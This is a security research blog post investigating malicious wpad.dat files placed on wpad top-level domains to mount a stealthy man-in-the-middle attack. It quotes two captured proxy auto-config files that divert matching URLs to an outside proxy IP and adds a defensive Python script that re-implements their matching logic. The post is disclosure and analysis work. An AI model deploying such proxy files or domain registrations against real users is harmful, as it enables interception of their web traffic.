The mysterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part III


Some weeks ago I (Jacopo Corbetta) and Luca Invernizzi wrote about a curious potential Man-In-The-Middle attack exploiting flaws in the Web Proxy Automatic Discovery (WPAD) and DNS protocols. Long story short, if you register a wpad.domain name you might be able to perform a very stealthy Man-In-The-Middle attack. Now, DNS is complicated and programs are buggy, so hijacking a wpad.Top-Level-Domain name like wpad.com (or wpad.it or (!) wroclaw.pl) could expose a lot of computers to your attack.

You might recall that I was puzzled by the content of wpad.it/wpad.dat and wondered what Italian sites were targeted. Then Luca pointed out it was registered by a Polish guy, and that he identified one of the possible targets as systempartnerski.pl.

We had in mind to run some analysis and then alert the registrars before posting again, but since the WPAD topic got attention on BugTraq yesterday it may be more timely to publish our results now.

UPDATE: The wpad.dat served by the Polish guy changed! It appears they removed the site identified by Luca! The file was still in the original form when we reported our findings to the Italian security mailing list sikurezza.org (see this message posted on 21/05; Alessandro posted our results on 18/05). This thing is getting interesting... Anyway, here's the new file:

function FindProxyForURL(url, host) {
        //regular expressions supported?
        if ( shExpMatch(url, "http*//*g*ad*nd*c*m*sh*ds*js") ) return "PROXY 72.55.164.182:80";
        return "DIRECT";
}

Hunting for WPAD exploits

As we wrote before, the only reliable list of effective top level domains is the one used in the Mozilla code, publicly maintained at publicsuffix.org. Each of these domains — if registered — could hide a malicious wpad.dat with potentially wide reach.

We think security-conscious DNS registrars should deny any request for these names — regardless of whether the underlying WPAD vulnerability is widespread or not, we should do everything in our power to reduce the attack potential.

In our first random probes, we found the same strange wpad.dat on wpad.it, wpad.cz and wpad.pl. But then we got curious: how common is this problem? How many wpad.dats are found in the wild? So I wrote a small Python script which attempted to resolve all wpad.tld names and to retrieve the associated wpad.tld/wpad.dat files.

The TLD menace

There are something like 3370 top-level domains in the publicsuffix.org list. 122 wpad.top-level-domain names are actually registered and return an IP address. 62 of them return data when asked for a wpad.dat over HTTP.

11 of those wpad.dats look like generic "domain parking" pages. I am not completely sure, since I don't speak all those languages. Here's the list:

.ar.com
.cm
.gouv.rw
.ph
.st
.tv
.cg
.co.st
.kiev.ua
.rw
.tk

The wpad.cn/wpad.dat and wpad.net.ua/wpad.dat also look like some kind of redirect pages. This brings the total of innocuous[1] domains to 13.

The wpad domains for Switzerland and Liechtenstein (.ch and .li) return a "neutral" wpad.dat (that is, no proxy for any URL). For .tsaritsyn.ru and .volgograd.ru an empty file is returned. I don't know if this means that the wpad domain name was claimed by some good guy (like the one who registered wpad.com, for example). To be completely sure we would need to perform the query from Switzerland or Russia.[2]

The wpad.dats for vn.ua, ptz.ru and karelia.ru look quite complicated and might even be legitimate proxying attempts by a regional ISP. Additional investigation would be required. Here are the files.

The remaining 42 wpad domains were serving exactly the same wpad.dat file (now they have changed it! See our update on top) (indented for clarity):

function FindProxyForURL(url, host) {
        //regular expression/complexity supported?
        if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || 
             (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && 
             !shExpMatch(url, "http*//*n*o.*")) ) 
        { 
                return "PROXY 72.55.164.182:80; DIRECT";
        }
        return "DIRECT";
}
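To audit what a captured wpad.dat like the one above would divert through the proxy without loading it into a browser, here is an added Python re-implementation of its decision logic (this is our illustration, not code from the original file or from the people who registered the domains); it models shExpMatch() as a whole-string, case-sensitive glob, which is how Firefox's PAC helper behaves, and the sample URLs are constructed:

```python
import fnmatch
from typing import List, Tuple

# Patterns and proxy string copied verbatim from the wpad.dat quoted above.
PROXY = "PROXY 72.55.164.182:80; DIRECT"
PATTERN_1 = "http://*g*ad*nd*c*m*sh*ds*js"      # still unexplained (a JS file?)
PATTERN_2 = "http*//*s*st*mp*tn*sk*p*"         # matches systempartnerski.pl
PATTERN_EXCLUDE = "http*//*n*o.*"              # very wide exclusion


def sh_exp_match(text: str, pattern: str) -> bool:
    """Python stand-in for the PAC shExpMatch() helper (assumption: glob
    semantics anchored at both ends; '*' = any run, '?' = one character)."""
    return fnmatch.fnmatchcase(text, pattern)


def find_proxy_for_url(url: str) -> Tuple[str, str]:
    """Same branches as the quoted FindProxyForURL, plus a reason string so
    an analyst can see which rule decided the outcome."""
    if sh_exp_match(url, PATTERN_1):
        return PROXY, "pattern 1"
    if sh_exp_match(url, PATTERN_2):
        if sh_exp_match(url, PATTERN_EXCLUDE):
            return "DIRECT", "pattern 2 hit, but exclusion applied"
        return PROXY, "pattern 2"
    return "DIRECT", "no rule matched"


def audit(urls: List[str]) -> List[Tuple[str, str, str]]:
    """Classify a list of URLs; returns (url, decision, reason) triples."""
    return [(u, *find_proxy_for_url(u)) for u in urls]


# Constructed sample URLs (hypothetical paths, chosen to exercise each branch).
SAMPLE_URLS = [
    "http://www.systempartnerski.pl/index.php",     # diverted to the proxy
    "http://www.systempartnerski.pl/info.html",     # 'n' then 'o.' -> excluded
    "http://example.com/gads/and/com/show/ads.js",  # contrived hit on pattern 1
    "https://www.example.org/login",                # untouched
]

if __name__ == "__main__":
    for url, decision, why in audit(SAMPLE_URLS):
        print(f"{decision:34} {why:38} {url}")
```

Running the same evaluator over a proxy log or a list of your own organisation's URLs shows exactly which requests a client that trusted this file would have sent to 72.55.164.182.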

All of these domains look like they have probably been registered by the same guy (even if WHOIS records are inconclusive). The whois for wpad.pl even has his name (we don't know if it is accurate, though, so we'll avoid posting names). Here is the list of affected domains:

.asia
.at
.be
.bialystok.pl
.biz.pl
.bydgoszcz.pl
.cc
.co.at
.com.es
.com.pl
.com.tw
.cz
.edu.pl
.es
.in
.it
.katowice.pl
.name
.net.cn
.net.in
.net.pl
.nom.es
.olsztyn.pl
.opole.pl
.org.cn
.org.es
.org.in
.org.pl
.org.tw
.pl
.radom.pl
.ro
.rzeszow.pl
.sk
.slask.pl
.szczecin.pl
.tw
.warszawa.pl
.waw.pl
.wroclaw.pl
.ws
.zgora.pl

As you can see, our friend has been able to grab the global wpad domain for 12 countries including Poland, Italy, Spain, Austria, Belgium, the Czech Republic, Romania and India.

Final thoughts and mysteries

The most obvious recommendation is that you register wpad.yourdomain.com in your organization's DNS (e.g. since our beloved school has sssup.it and we administrate the allievi.sssup.it subdomain, we have associated wpad.allievi.sssup.it with a meaningless IP and we'll recommend that the network staff do the same with wpad.sssup.it). This will immediately stop the search for a wpad.dat by your clients.

We would also recommend registrars to delete wpad.domain entries or at least to avoid accepting new ones. As time allows (the exam session is near!) we'll bring this matter to the attention of the registrar admins; let's hope they listen to us. If someone with a big name is reading this (cool!), you might wish to contact some DNS authorities.

While Luca cracked the second wildcard expression (http*//*s*st*mp*tn*sk*p*), we still have no idea about which sites are targeted by the first one (http://*g*ad*nd*c*m*sh*ds*js, maybe a JavaScript file?). And why did they use such a wide exclusion pattern (http*//*n*o.*) in the original file? Also, the proxy isn't working for us — maybe they are answering only to IPs in Poland?

Now that the Polish guys changed their wpad.dat a few days ago, we wonder what our next move should be... and what their next move will be! We'll post updates here, so stay tuned.

  1. The wpad.dat file has to be in a special JavaScript-like format, see findproxyforurl.com for details.
  2. The wpad.ch server might be serving a harmless wpad.dat to foreign hunters and a malicious one to domestic victims (of course, this applies to all domains in this list — with the possible exception of Italy, our home country).


  • Guest

    thanks

    proxy privacyblock.info

    john

  • Sono

    ??????????? where is the way to navigate as an Italian Web Surfer ???